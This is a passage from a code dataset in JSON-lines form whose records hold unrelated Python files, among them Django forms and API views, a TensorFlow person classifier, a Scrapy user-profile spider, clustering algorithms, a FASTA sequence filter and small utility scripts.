href='/ep-curves', className=\"tab\"),\n\n # dcc.Link('Portfolio Impact ', href='/portfolio-impact', className=\"tab\"),\n\n ], className=\"row \")\n return menu","sub_path":"components/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"37916991","text":"from django import forms\nfrom .models import Document, Appointment\n\n\nclass DocumentForm(forms.ModelForm):\n class Meta:\n model = Document\n fields = ('document',)\n\nsymptlist = []\nfor i in Appointment.objects.all():\n symptlist.append((i.symptom, i.symptom))\nnewsymptlist = list(dict.fromkeys(symptlist))\n\n\nclass Symptom(forms.Form):\n symptom = forms.ChoiceField(choices=newsymptlist, label=\"Enter Symptom\")\n\n\ndiaglist = []\nfor i in Appointment.objects.all():\n diaglist.append((i.diagnosis, i.diagnosis))\nnewdiaglist = list(dict.fromkeys(diaglist))\n\n\nclass Diagnosis(forms.Form):\n diag = forms.ChoiceField(choices=newdiaglist, label=\"Enter Diagnosis\")\n\n\nReportchoice = [('General Date', 'General Date'), ('General Symptoms', 'General Symptoms'),\n ('General Diagnosis', 'General Diagnosis'), ('Specific Symptom', 'Specific Symptom'),\n ('Specific Diagnosis', 'Specific Diagnosis')]\n\ndlist = []\nfor i in Appointment.objects.all():\n dlist.append((i.date[:10], i.date[:10]))\nnewdatelist = list(dict.fromkeys(dlist))\n\n\nclass Report(forms.Form):\n report = forms.ChoiceField(choices=Reportchoice, label=\"Report Type\")\n startdate = forms.CharField( label=\"Start Date\", max_length=10)\n enddate = forms.CharField(label=\"End Date\", max_length=10)\n","sub_path":"medproc/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"643316342","text":"from __future__ import division, print_function, unicode_literals\nimport os\nimport cv2\nfrom collections import defaultdict\nfrom scipy.misc import imresize\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.contrib.slim.nets import inception\nimport tensorflow.contrib.slim as slim\nfrom random import sample\n\n\nwidth = 299\nheight = 299\nchannels = 3\nINCEPTION_PATH = os.path.join(\"datasets\", \"inception\")\nINCEPTION_V3_CHECKPOINT_PATH = os.path.join(INCEPTION_PATH, \"inception_v3.ckpt\")\n\n# Get all the images as dictionary\nPERSON_PATH = os.path.join(\"datasets\", \"person\")\nperson_root_path = os.path.join(PERSON_PATH, \"person_photos\")\nperson_classes=os.listdir(person_root_path)\nimage_paths = defaultdict(list)\n\nfor person_class in person_classes:\n image_dir = os.path.join(person_root_path, person_class)\n for filepath in os.listdir(image_dir):\n if filepath.endswith(\".jpg\") or filepath.endswith(\".png\"):\n image_paths[person_class].append(os.path.join(image_dir, filepath))\n \nfor paths in image_paths.values():\n paths.sort() \n \n\ndef prepare_image(example_image):\n image = imresize(example_image, (width, height)) \n return image.astype(np.float32)/255 \n\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, shape=[None, height, width, channels], name=\"X\")\ntraining = tf.placeholder_with_default(False, shape=[])\n\nwith slim.arg_scope(inception.inception_v3_arg_scope()):\n logits, end_points = inception.inception_v3(X, num_classes=1001, is_training=training)\n\ninception_saver = tf.train.Saver()\n\nprelogits = tf.squeeze(end_points[\"PreLogits\"], axis=[1, 2])\n\nn_outputs = len(person_classes)\n\nwith tf.name_scope(\"new_output_layer\"):\n person_logits = tf.layers.dense(prelogits, n_outputs, name=\"person_logits\")\n Y_proba = tf.nn.softmax(person_logits, name=\"Y_proba\")\n \ny = tf.placeholder(tf.int32, shape=[None])\n\n\nwith tf.name_scope(\"train\"):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=person_logits, labels=y)\n loss = tf.reduce_mean(xentropy)\n optimizer = tf.train.AdamOptimizer()\n flower_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=\"person_logits\")\n training_op = optimizer.minimize(loss, var_list=flower_vars)\n \nwith tf.name_scope(\"eval\"):\n correct = tf.nn.in_top_k(person_logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n \nwith tf.name_scope(\"init_and_save\"):\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\nperson_class_ids = {flower_class: index for index, flower_class in enumerate(person_classes)}\nprint(person_class_ids) \n\nperson_paths_and_classes = []\nfor person_class, paths in image_paths.items():\n for path in paths:\n person_paths_and_classes.append((path, person_class_ids[person_class])) \n \ntest_ratio = 0.2\ntrain_size = int(len(person_paths_and_classes) * (1 - test_ratio))\n\nnp.random.shuffle(person_paths_and_classes)\n\nperson_paths_and_classes_train = person_paths_and_classes[:train_size]\nperson_paths_and_classes_test = person_paths_and_classes[train_size:]\n\ndef prepare_batch(person_paths_and_classes, batch_size):\n batch_paths_and_classes = sample(person_paths_and_classes, batch_size)\n images = []\n for path, labels in batch_paths_and_classes:\n if(cv2.imread(path) is not None):\n images.append(cv2.imread(path)[:, :, :channels])\n prepared_images = [prepare_image(image) for image in images]\n X_batch = 2 * np.stack(prepared_images) - 1 # Inception expects colors ranging from -1 to 1\n y_batch = np.array([labels for path, labels in batch_paths_and_classes], dtype=np.int32)\n return X_batch, y_batch \n\nX_batch, y_batch = prepare_batch(person_paths_and_classes_train, batch_size=4)\nprint(X_batch.shape,y_batch.shape,X_batch.dtype,y_batch.dtype) \n\nX_test, y_test = prepare_batch(person_paths_and_classes_test, batch_size=len(person_paths_and_classes_test))\n\n# Training of Inception_v3 on Human Dataset uncomment below lines for training and comment lines below Testing step \n\nn_epochs = 50\nbatch_size = 40\nn_iterations_per_epoch = len(person_paths_and_classes_train) // batch_size\n'''\nwith tf.Session() as sess:\n init.run()\n inception_saver.restore(sess, INCEPTION_V3_CHECKPOINT_PATH)\n\n for epoch in range(n_epochs):\n print(\"Epoch\", epoch, end=\"\")\n for iteration in range(n_iterations_per_epoch):\n print(\".\", end=\"\")\n X_batch, y_batch = prepare_batch(person_paths_and_classes_train, batch_size)\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch, training: True})\n\n acc_train = accuracy.eval(feed_dict={X: X_batch, y: y_batch})\n print(\" Train accuracy:\", acc_train)\n\n save_path = saver.save(sess, \"./human_classification_checkpoints/person_model\"+str(acc_train)+\".ckpt\")\n\n '''\n# Testing the trained model and accuracy is 98% \n\nn_test_batches = 10\nX_test_batches = np.array_split(X_test, n_test_batches)\ny_test_batches = np.array_split(y_test, n_test_batches)\n\nwith tf.Session() as sess:\n saver.restore(sess, \"./human_classification_checkpoints/person_model1.0.ckpt\")\n\n print(\"Computing final accuracy on the test set (this will take a while)...\")\n acc_test = np.mean([\n accuracy.eval(feed_dict={X: X_test_batch, y: y_test_batch})\n for X_test_batch, y_test_batch in zip(X_test_batches, y_test_batches)])\n print(\"Test accuracy:\", acc_test) \n \n","sub_path":"human_classification.py","file_name":"human_classification.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"589258697","text":"# encoding: utf-8\n# Copyright 2013–2017 California Institute of Technology. ALL RIGHTS\n# RESERVED. U.S. Government Sponsorship acknowledged.\n\nfrom .setuphandlers import publish\nfrom edrn.rdf import DEFAULT_PROFILE\nfrom plone.dexterity.utils import createContentInContainer\nfrom edrn.rdf.labcascollectionrdfgenerator import ILabCASCollectionRDFGenerator\nimport plone.api\n\n\ndef nullUpgradeStep(setupTool):\n '''A null step when a profile upgrade requires no custom activity.'''\n\n\ndef upgrade3to4(setupTool):\n setupTool.runImportStepFromProfile(DEFAULT_PROFILE, 'typeinfo')\n\n\ndef upgrade4to5(setupTool):\n # Note that I (kelly) went ahead and added these through the web to the\n # running https://edrn.jpl.nasa.gov/cancerdataexpo/ so we could take\n # immediate advantage of the new data without cutting a new release.\n # This is provided just in case there is a disaster and we need to\n # re-release.\n portal = setupTool.getSite()\n if 'rdf-generators' in list(portal.keys()):\n rdfGenerators = portal['rdf-generators']\n if 'person-generator' in list(rdfGenerators.keys()):\n personGenerator = rdfGenerators['person-generator']\n if 'staff_status' not in list(personGenerator.keys()):\n predicate = createContentInContainer(\n personGenerator,\n 'edrn.rdf.literalpredicatehandler',\n title='Staff_Status',\n description='''Maps from DMCC's Staff_Status to the EDRN-specific predicate for employmentActive.''',\n predicateURI='http://edrn.nci.nih.gov/rdf/schema.rdf#employmentActive'\n )\n publish(predicate, plone.api.portal.get_tool('portal_workflow'))\n if 'publications-generator' in list(rdfGenerators.keys()):\n publicationsGenerator = rdfGenerators['publications-generator']\n if 'siteid' not in list(publicationsGenerator.keys()):\n predicate = createContentInContainer(\n publicationsGenerator,\n 'edrn.rdf.referencepredicatehandler',\n title='SiteID',\n description='''Maps from the DMCC's SiteID to the EDRN-specific predicate for site ID.''',\n predicateURI='http://edrn.nci.nih.gov/rdf/schema.rdf#site',\n uriPrefix='http://edrn.nci.nih.gov/data/sites/'\n )\n publish(predicate, plone.api.portal.get_tool('portal_workflow'))\n\n\ndef upgrade5to6(setupTool):\n catalog = plone.api.portal.get_tool('portal_catalog')\n for brain in catalog(object_provides=ILabCASCollectionRDFGenerator.__identifier__):\n obj = brain.getObject()\n obj.labcasSolrURL = 'https://edrn-labcas.jpl.nasa.gov/data-access-api'\n","sub_path":"src/edrn.rdf/edrn/rdf/upgrades.py","file_name":"upgrades.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"491120864","text":"# -*- coding: utf-8 -*-\nfrom dataclasses import asdict\nfrom datetime import datetime\nfrom unittest import TestCase\nfrom uuid import uuid4\n\nfrom bson import ObjectId\nfrom marshmallow_dataclass import class_schema\n\nfrom eduid_userdb.testing import normalised_data\n\nfrom eduid_scimapi.schemas.scimbase import BaseResponse, Meta, SCIMResourceType, SCIMSchema, SubResource\n\n__author__ = 'lundberg'\n\n\nclass TestScimBase(TestCase):\n def test_meta(self) -> None:\n meta = Meta(\n location='http://example.org/group/some-id',\n resource_type=SCIMResourceType.GROUP,\n created=datetime.utcnow(),\n last_modified=datetime.utcnow(),\n version=ObjectId(),\n )\n schema = class_schema(Meta)\n meta_dump = schema().dump(meta)\n loaded_meta = schema().load(meta_dump)\n assert normalised_data(asdict(meta)) == normalised_data(asdict(loaded_meta))\n\n def test_base_response(self) -> None:\n meta = Meta(\n location='http://example.org/group/some-id',\n resource_type=SCIMResourceType.GROUP,\n created=datetime.utcnow(),\n last_modified=datetime.utcnow(),\n version=ObjectId(),\n )\n base = BaseResponse(id=uuid4(), schemas=[SCIMSchema.CORE_20_USER, SCIMSchema.CORE_20_GROUP], meta=meta)\n schema = class_schema(BaseResponse)\n base_dump = schema().dump(base)\n loaded_base = schema().load(base_dump)\n assert normalised_data(asdict(base)) == normalised_data(asdict(loaded_base))\n\n def test_hashable_subresources(self):\n a = {\n '$ref': 'http://localhost:8000/Users/78130160-b63d-4303-99cd-73767e2a999f',\n 'display': 'Test User 1 (updated)',\n 'value': '78130160-b63d-4303-99cd-73767e2a999f',\n }\n b = {\n '$ref': 'http://localhost:8000/Groups/f194099c-23a9-4046-8cd6-79e472476fd2',\n 'display': 'Test Group 2 (also updated)',\n 'value': 'f194099c-23a9-4046-8cd6-79e472476fd2',\n }\n res_a = SubResource.from_mapping(a)\n res_b = SubResource.from_mapping(b)\n self.assertNotEqual(res_a, res_b)\n\n res_set = {res_a, res_b}\n self.assertIsInstance(res_set, set)\n","sub_path":"src/eduid_scimapi/tests/test_scimbase.py","file_name":"test_scimbase.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"488850552","text":"import cv2\nfrom keras.models import *\nfrom data_process_before_train import learning_rate_type\nfrom data_process_before_train import adjust_brightness_contrast\nimport numpy as np\nimport sys\nimport time\nimport os\n\n\"\"\"强制使用CPU\"\"\"\n# os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"\"\n\n\"\"\"---------------导入模型--------------------\"\"\"\nmodel_name = 'hongqiao'\ndata_type = 5\nlearning_rate = 0.00001\nlr_m, lr_index = learning_rate_type(learning_rate)\nbatch_size = 1\nepoch = 50\n\nnew_model=load_model('saved_models/{}_dt{}_lr{}e{}_bs{}_ep{}'\n '.h5'.format(model_name, data_type, lr_m, lr_index, batch_size, epoch))\n\n\"\"\"----------------读入视频-----------------\"\"\"\n# video_path='../../../video/videos1/vid0.ts'\nvideo_path = sys.argv[1]\nbrighten = int(sys.argv[2]) # 0表示不提高亮度,1表示提高亮度\ncap = cv2.VideoCapture()\ncap.open(video_path)\n\n\"\"\"---------------对视频帧进行处理-----------------\"\"\"\n# 设置处理的帧间隔,看多少帧间隔,配合运算时间,可以实现良好的显示效果\nframe_interval = 15\n# 获取视频总帧数\ntotal_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\nprint(\"total frame:\", total_frames)\n\n# 对视频进行分析\nnum_people = 0\ntime_last = time.time()\nfor i in range(total_frames):\n _, frame = cap.read()\n # 改变亮度\n if brighten == 1:\n frame=adjust_brightness_contrast(frame,1.5,+50)\n\n # 每隔frame_interval去刷新一下人数\n if (i + 1) % frame_interval == 0:\n time_start = time.time()\n image = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\n image = cv2.resize(image, (480, 300))\n\n image[0:35, :] = 0\n image = image / 255\n # image = (image - 127.5) / 128\n image_input = np.reshape(image, (1, image.shape[0], image.shape[1], 1))\n density_map = new_model.predict(image_input)\n num_people = np.round(np.sum(density_map))\n\n # 保存density map\n density_map = np.reshape(density_map, (density_map.shape[1], density_map.shape[2]))\n density_map_image = density_map / np.max(density_map) * 255 * 10\n density_map_image = density_map_image.astype(\"uint8\")\n density_map_image = cv2.resize(density_map_image, (density_map_image.shape[1] * 2,\n density_map_image.shape[0] * 2))\n cv2.imshow('density_map', density_map_image)\n cv2.imwrite('../density_map/den_{:0>5d}.jpg'.format(i), density_map)\n # time_now = time.time()\n # used_time=time_now-time_last\n # time_last=time_now\n time_end = time.time()\n used_time = time_end - time_start\n print(\"used_time for a update:\", used_time)\n\n cv2.waitKey(19950731)\n\n # frame[0:180, :] = 0\n frame = cv2.resize(frame, (1400, 900))\n # 把人数写到图片上\n cv2.putText(frame, \"num_people:{}\".format(num_people),\n (75, 75), cv2.FONT_HERSHEY_SIMPLEX, 3, (0, 0, 255), 3)\n cv2.imshow('video', frame)\n\n if cv2.waitKey(1) == 27:\n break\n\n# 关闭cap\ncap.release()\n","sub_path":"video_test.py","file_name":"video_test.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"40471948","text":"import scrapy\n\nfrom ICE_spider_EXP1.items import UserItem\n\nclass UserSpider(scrapy.Spider):\n name = 'users'\n\n def start_requests(self):\n top10_url = 'https://segmentfault.com/users'\n yield scrapy.Request(url=top10_url, callback=self.parse_top10)\n\n def parse_top10(self,response):\n users = response.xpath(\"//div[@class='d-flex align-items-center']/a[2]\")\n\n for user in users:\n user_item = UserItem()\n\n user_item['username'] = user.xpath('@href').get().split('/')[2]\n user_item['nickname'] = user.xpath('span/text()').get()\n\n # yield user_item\n\n profile_url = 'https://segmentfault.com/u/'+user_item['username']\n yield scrapy.Request(url=profile_url, callback=self.parse_profile, meta={'hero_item': user_item['username']})\n \n def parse_profile(self,response):\n user_itemAll = UserItem()\n item = response.meta.get('hero_item')\n user_itemAll['username'] = item\n user_itemAll['nickname'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/h3/text()').get()\n user_itemAll['like'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[1]/div[2]/strong/text()').get()\n user_itemAll['fans'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[1]/div[3]/strong/text()').get()\n user_itemAll['prestige'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[1]/div[1]/a/strong/text()').get()\n user_itemAll['location'] = response.xpath('//*[@id=\"root\"]/div[4]/div/div[1]/div[1]/div/div[2]/div[3]/span/text()').get()\n\n yield user_itemAll","sub_path":"ICE_spider_EXP1/ICE_spider_EXP1/spiders/userspider.py","file_name":"userspider.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"651309365","text":"\"\"\"\nAlgorithmic Thinking - Module 3\n10-5-2014\n\nDivide and Conquer Method and Clustering\nClosest Pairs and Clustering Algorithms\nProject File\n\nStudent will implement four functions:\nslow_closest_pairs(cluster_list)\nfast_closest_pair(cluster_list) - implement fast_helper()\nhierarchical_clustering(cluster_list, num_clusters)\nkmeans_clustering(cluster_list, num_clusters, num_iterations)\n\nwhere cluster_list is a list of clusters in the plane\n\"\"\"\n\nimport math\nimport alg_cluster\n\ndef pair_distance(cluster_list, idx1, idx2):\n \"\"\"\n Helper function to compute Euclidean distance between two clusters\n in cluster_list with indices idx1 and idx2\n \n Returns tuple (dist, idx1, idx2) with idx1 < idx2 where dist is distance between\n cluster_list[idx1] and cluster_list[idx2]\n \"\"\"\n return (cluster_list[idx1].distance(cluster_list[idx2]), min(idx1, idx2), max(idx1, idx2))\n\n\n\ndef slow_closest_pairs(cluster_list):\n \"\"\"\n Compute the set of closest pairs of cluster in list of clusters\n using O(n^2) all pairs algorithm\n \n Returns the set of all tuples of the form (dist, idx1, idx2) \n where the cluster_list[idx1] and cluster_list[idx2] have minimum distance dist. \n \n \"\"\"\n current_dist = float(\"inf\") # set default current distance\n closest_pair = [] # default empty list\n epsilon = .000000001 # default value to measure against differences\n \n for index_u in xrange(len(cluster_list)): # go through each index\n for index_v in xrange(len(cluster_list)): # each comparison index\n if index_u != index_v: # make sure indeces are not the same\n distance_pair = pair_distance(cluster_list, index_u, index_v) # compute distance based on cluster index\n if abs(distance_pair[0] - current_dist) < epsilon: # test if less than current distance\n closest_pair.append(distance_pair)# assign new distance and cluster indeces\n elif distance_pair[0] < current_dist:\n closest_pair = [distance_pair]\n current_dist = distance_pair[0]\n \n if len(closest_pair) == 0:\n closest_pair = [(current_dist, -1, -1)] # set default distance and index\n return set(closest_pair)\n\n\n\ndef fast_closest_pair(cluster_list):\n \"\"\"\n Compute a closest pair of clusters in cluster_list\n using O(n log(n)) divide and conquer algorithm\n \n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\n cluster_list[idx1] and cluster_list[idx2]\n have the smallest distance dist of any pair of clusters\n \"\"\"\n \n def fast_helper(cluster_list, horiz_order, vert_order):\n \"\"\"\n Divide and conquer method for computing distance between closest pair of points\n Running time is O(n * log(n))\n \n horiz_order and vert_order are lists of indices for clusters\n ordered horizontally and vertically\n \n Returns a tuple (distance, idx1, idx2) with idx1 < idx 2 where\n cluster_list[idx1] and cluster_list[idx2]\n have the smallest distance dist of any pair of clusters\n \n \"\"\"\n if len(horiz_order) < 4: # test if number of clusters less than 4\n list_q = [cluster_list[idx] for idx in horiz_order]\n closest_pair = list(slow_closest_pairs(list_q))\n return tuple((closest_pair[0][0], horiz_order[closest_pair[0][1]], horiz_order[closest_pair[0][2]]))# if less than use brute force algorithm\n ## base case for fast helper\n \n else:\n idx_m = len(horiz_order) / 2 # number of points in each list half\n horiz_left, horiz_right = horiz_order[:idx_m], horiz_order[idx_m:] \n # split lists into halves\n vert_left, vert_right = [idx for idx in vert_order if idx in set(horiz_left)], [idx for idx in vert_order if idx in set(horiz_right)]\n # split vertical elements in half to match horizontal\n left_distance, right_distance = fast_helper(cluster_list, horiz_left, vert_left), fast_helper(cluster_list, horiz_right, vert_right)\n # recursively find the closest distances in the smaller lists\n if left_distance[0] < right_distance[0]:\n closest_pair = left_distance\n else:\n closest_pair = right_distance\n ## divide cluster lists in half and find distances\n \n hcoord = (1/2.0) * (cluster_list[horiz_order[idx_m - 1]].horiz_center() + cluster_list[horiz_order[idx_m]].horiz_center())\n # find the horizontal coordinate of the two middle clusters\n list_split = [idx for idx in vert_order if abs(cluster_list[idx].horiz_center() - hcoord) < closest_pair[0]] \n for idx_u in xrange(len(list_split) - 1):\n for idx_v in xrange(idx_u + 1, min([idx_u + 3, len(list_split) - 1]) + 1):\n contender = pair_distance(cluster_list, list_split[idx_u], list_split[idx_v])\n if closest_pair[0] > contender[0]:\n closest_pair = contender\n ## conquer remaining clusters by comparison\n\n return closest_pair\n \n # compute list of indices for the clusters ordered in the horizontal direction\n hcoord_and_index = [(cluster_list[idx].horiz_center(), idx) \n for idx in range(len(cluster_list))] \n hcoord_and_index.sort()\n horiz_order = [hcoord_and_index[idx][1] for idx in range(len(hcoord_and_index))]\n \n # compute list of indices for the clusters ordered in vertical direction\n vcoord_and_index = [(cluster_list[idx].vert_center(), idx) \n for idx in range(len(cluster_list))] \n vcoord_and_index.sort()\n vert_order = [vcoord_and_index[idx][1] for idx in range(len(vcoord_and_index))]\n\n # compute answer recursively\n answer = fast_helper(cluster_list, horiz_order, vert_order)\n return (answer[0], min(answer[1:]), max(answer[1:]))\n\n \n\ndef hierarchical_clustering(cluster_list, num_clusters):\n \"\"\"\n Compute a hierarchical clustering of a set of clusters\n Note: the function mutates cluster_list\n \n Input: List of clusters, number of clusters\n Output: List of clusters whose length is num_clusters\n \"\"\"\n while len(cluster_list) > num_clusters:\n current = fast_closest_pair(cluster_list)\n cluster_list[current[1]].merge_clusters(cluster_list[current[2]])\n cluster_list.pop(current[2])\n return cluster_list\n \n \n \ndef kmeans_clustering(cluster_list, num_clusters, num_iterations):\n \"\"\"\n Compute the k-means clustering of a set of clusters\n \n Input: List of clusters, number of clusters, number of iterations\n Output: List of clusters whose length is num_clusters\n \"\"\"\n cluster_list_sorted = sorted(cluster_list, key = lambda x: x.total_population(), reverse = True)\n k_clusters = cluster_list_sorted[:num_clusters]\n # initialize k-means clusters to be initial clusters with largest populations\n for dummy_idx in xrange(num_iterations):\n new_clusters = [alg_cluster.Cluster(set([]), 0, 0, 1, 0) for dummy_idx in xrange(num_clusters)]\n for idx_j in xrange(len(cluster_list)):\n current_dist = [cluster_list[idx_j].distance(k_clusters[idx_l]) for idx_l in xrange(num_clusters)]\n idx_l = min(xrange(len(current_dist)), key=current_dist.__getitem__)\n new_clusters[idx_l].merge_clusters(cluster_list[idx_j]) \n k_clusters = new_clusters[:]\n \n return k_clusters\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"Module 3/Project_3.py","file_name":"Project_3.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"205313663","text":"import json\nimport pygame\n\nclass Level(object):\n _levelDef = None\n surface = None\n _tileSize = None\n\n def __init__(self, levelName):\n with open(levelName, \"r\") as levelData:\n self._levelDef = json.load(levelData)\n self.width = self._levelDef['w']\n self.height = self._levelDef['h']\n\n self.surface = pygame.Surface((self.width, self.height))\n pixels = pygame.PixelArray(self.surface)\n\n for item in self._levelDef['map']:\n x = item['x']\n y = item['y']\n color = tuple(self._levelDef['materials'][item['mat']])\n for dx in range(0, item['w']):\n for dy in range(0, item['h']):\n pixels[x+dx, y+dy] = color\n\n def update(self, tileSize):\n if(tileSize != self._tileSize):\n self.surface = pygame.transform.scale(self.surface, (self.width * tileSize, self.height * tileSize))\n self._tileSize = tileSize\n","sub_path":"level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"651179516","text":"'''\r\nfilter multifasta file with hard seq_length disbalance\r\nshould been in dir with file 'spisok.txt', that contains:\r\n\r\nfile_name1--seq_length1\r\nfile_name2--seq_length2\r\nfile_name3--seq_length3\r\nfile_name4--seq_length4\r\n .......\r\nin this dir locate dir \"inp\" with fasta files\r\nUPGRADE version also add further sequence if particular species is not represent\r\nin file. It's was made that tree always have min 7 leafes.\r\n'''\r\n\r\nfrom glob import glob\r\nfrom Bio.Seq import Seq\r\nfrom Bio import SeqIO\r\nimport pandas as pd\r\nfrom os import makedirs\r\nimport os, re\r\nfrom os.path import basename\r\n\r\nos.getcwd()\r\nos.chdir('../input_data/ex_out/out/parsed/out/out_by_gene/')\r\nos.listdir()\r\n\r\n\r\ng=glob('exp_seqs/*.fasta')\r\ng\r\nrecords = []\r\n\r\ntry:\r\n makedirs('exp_filtred')\r\nexcept:\r\n pass\r\n\r\n# with open('res.txt','w') as data:\r\n# pass\r\n\r\nl, h = 200, 200\r\nkey = {}\r\nwith open('spisok.txt') as data:\r\n for line in data:\r\n if line.rstrip():\r\n k = re.split('\\.', line)[0]\r\n v = int(re.split('--', line)[1])\r\n key[k] = v\r\n # line = line.split('--')\r\n # key[line[0]] = int(line[1].rstrip())\r\n\r\nfor fa in g:\r\n rec, records = [], []\r\n k = 0\r\n spec_all, spec_list, minrec = [], [], []\r\n for record in SeqIO.parse(fa, 'fasta'):\r\n f_med = key[re.split('_', basename(fa))[0]]\r\n # print(f_med)\r\n k += 1\r\n spec = record.id.split('_')[0]\r\n spec_all.append(spec)\r\n if len(str(record.seq))<=f_med+h and len(str(record.seq))>=f_med-l:\r\n rec.append(record)\r\n spec_list.append(spec)\r\n else:\r\n h_dist = abs(len(str(record.seq))-(f_med+h))\r\n l_dist = abs(len(str(record.seq))-(f_med-l))+200\r\n minrec.append([min(h_dist, l_dist), spec, record])\r\n\r\n\r\n spec_all = list(set(spec_all))\r\n spec_list = list(set(spec_list))\r\n spec_list = [i for i in spec_all if i not in spec_list[:]]\r\n\r\n\r\n minrec = sorted(minrec, key = lambda x: x[0])\r\n if spec_list:\r\n for i in minrec:\r\n if spec_list:\r\n if i[1] in spec_list:\r\n rec.append(i[2])\r\n spec_list.remove(i[1])\r\n else:\r\n break\r\n\r\n with open('res.txt', 'a') as data:\r\n data.write('\\n'.join([basename(fa)+'--'+str(f_med), 'interval from '+str(f_med-l)+' to '+str(f_med+h), 'all '+str(k),\\\r\n 'new the nearest '+str(len(rec)), '']))\r\n else:\r\n with open('res.txt','a') as data:\r\n data.write('\\n'.join([basename(fa)+'--'+str(f_med), 'interval from '+str(f_med-l)+' to '+str(f_med+h), 'all '+str(k), 'new '+str(len(rec)),'']))\r\n\r\n SeqIO.write(rec,'exp_filtred/'+basename(fa), \"fasta\")\r\n##\r\n##\r\n","sub_path":"scripts/restrict_seq_UPGRADE.py","file_name":"restrict_seq_UPGRADE.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"57518970","text":"#INTERCALAÇÃO DE VETORES\ndef ordena(m, quant):\n for i in range(quant - 1):\n for j in range(i+1, quant):\n if m[i] > m[j]:\n x = m[j]\n m[j] = m[i]\n m[i] = x\n#def intercala()\n\nm = [9, 7, 3, 5]\nn = [2, 8, 4, 6]\n\nfor c in range(4):\n print(m[c], end=' ')\nprint()\nfor i in range(4):\n print(n[i], end=' ')\n\nordena(m, 4)\nprint()\nprint(m, end=' ')\n\nordena(n, 4)\nprint()\nprint(n, end=' ') \n","sub_path":"Semestre1ProjetoALP/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476641334","text":"from rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\n\nfrom django.core import serializers\nfrom rest_framework.response import Response\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\ntry:\n from urllib import quote_plus # python 2\nexcept:\n pass\n\ntry:\n from urllib.parse import quote_plus # python 3\nexcept:\n pass\n\nfrom django.contrib import messages\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.db.models import Q\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404, HttpResponseForbidden\nfrom django.shortcuts import render, get_object_or_404, redirect\n\nfrom pingow_api import models as m\nfrom pingow_api import serializers as s\nfrom pingow_api.forms import CustomerCreationForm, CustomerForm, AssistanceForm, CustomerTransactionForm\n\ndef db_customer_json (request):\n obj = m.Customer.objects.all()\n serializer =s.CustomerSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_shop_json (request):\n obj = m.Shop.objects.all()\n serializer =s.ShopSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_beacon_json (request):\n obj = m.Beacon.objects.all()\n serializer =s.BeaconSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_beacon_relationship_json (request):\n obj = m.BeaconRelationship.objects.all()\n serializer =s.BeaconRelationshipSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_assistance_json (request):\n obj = m.Assistance.objects.all()\n serializer =s.AssistanceSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_crowd_json (request):\n obj = m.Crowd.objects.all()\n serializer =s.CrowdSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_assistance_avail_json (request):\n obj = m.AssistanceAvail.objects.all()\n serializer =s.AssistanceAvailSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_shop_subcat_reference_json (request):\n obj = m.ShopSubCatReference.objects.all()\n serializer =s.ShopSubCatReferenceSerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef db_sub_category_json (request):\n obj = m.SubCategory.objects.all()\n serializer =s.SubCategorySerializer(obj, many = True)\n return JsonResponse(serializer.data, safe=False)\n\ndef 